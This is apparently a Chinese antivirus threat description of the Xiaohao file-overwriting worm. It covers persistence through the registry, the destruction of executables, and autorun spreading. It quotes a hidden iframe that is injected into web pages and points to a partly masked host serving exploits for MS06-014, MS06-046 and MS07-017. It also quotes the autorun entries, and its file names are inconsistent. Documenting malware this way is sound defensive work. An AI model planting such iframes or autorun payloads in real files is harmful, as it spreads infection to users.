病毒名称(中文):
病毒别名:
威胁级别:
★★☆☆☆
病毒类型:
蠕虫病毒
病毒长度:
40960
影响系统:
Win9xWinMeWinNTWin2000WinXPWin2003
病毒行为:
这是一个恶性的覆盖文件的病毒,它能覆盖用户机器上的exe文件,
使机器上的exe文件全部损坏,无法修复,此外它还会感染网页与脚本文件。
1:复制本体
病毒运行后,会把自己复制到以下目录:
%Windows%\\System32\\exloroe.exe
2:更改注册表
病毒会更改以下两处注册表值
不显示隐藏文件
HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\ShowAll
CheckedValue=0x00
添加自启动
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\ActiveSetup\\InstalledComponents\\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}
stubpath=%SystemRoot%\\system32\\exploroe.exe
3:修改文件
病毒会枚举用户机器上的文件,并修改以下扩展名的文件:
a:exe文件
病毒发现扩展名为exe的文件时,会检测它是否为正确的PE文件,若发现它是正常的PE文件,
则把自己覆盖到目标文件,若目标文件大小比病毒体大时,则病毒体会覆盖在目标文件的前面部分;
若目标文件比病毒体要小时,病毒体就会直接替换目标文件。病毒会使用户机器上的PE文件全部损坏,
并且无法修复,并且把没有感染的文件加入隐藏的属性。
但病毒不会感染以下文件名的文件:
config.exe
XiaoHao.exe
xiaohao.exe
b:jsp、php、aspx、asp、htm、html文件
病毒若发现以上扩展名的文件时,在文件尾部加一个隐藏的框架
iframesrc=http://xiaohao.****.biz/xiaohao.htmwidth=0height=0
该网页会利用3个已知的漏洞下载病毒,它们分别是:MS06-014、MS06-046、MS07-017
c:记录文件
病毒会把自己修改过的文件记录在一个txt文件里面
c:\Jilu.txt
4:利用autorun传播
病毒会在每一个分区的根目录下生成autorun.ini文件,并利用它传播
[Autorun]
open=Xiaohao.exe
shellexecute=Xiaohao.exe
shell\Auto\command=Xiaohao.exe
Xiaohao.exe是病毒体的一个拷贝
5:更改窗口名
病毒会把当前活动窗口的窗口名改为"已中毒X14o-H4o',27h,'sVirus"
6:更改系统时间
病毒会把系统的时间改为2005年1月17日
